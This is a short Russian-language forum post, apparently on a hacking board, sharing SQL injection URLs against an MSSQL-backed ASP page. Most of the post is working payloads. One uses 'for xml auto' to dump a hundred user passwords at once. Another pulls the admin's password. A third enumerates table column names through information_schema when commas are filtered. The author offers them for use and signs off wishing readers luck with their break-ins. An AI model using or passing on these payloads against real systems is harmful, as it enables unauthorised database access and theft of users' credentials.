Всем спасибо разобрался))))
Может кому пригодится:
использовал вывод в XML актуально только для MSSQL

hxxp://хост/default.asp?idAccess=1808310+or+1=(SELECT+TOP+100+ pw+FROM+Users+for+xml+auto)-- выводит 100 паролей пользователей в Xml формате очень удобно!

так если hxxp://хост/default.asp?idAccess=1808310+or+1=(SELECT+TOP+1+pw +FROM+Users+where+login='admin'+for+xml+auto)-- выводит только админа))))

а если фильтруется запятая или пишет что URL слишком длинный при том мы пытаемся вытянуть имена полей таблиц использвал такую конструкцию запроса:
hxxp://хост/default.asp?idAccess=1808310+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='Users'+and+column_name+not+in+(select+to p+1+column_name+from+information_schema.columns+wh ere+table_name='Users'))--

далее top+1 top+2 top+3 и так далее)))Все удачи во взломах!
PS я ломал не просто так а была необходимость)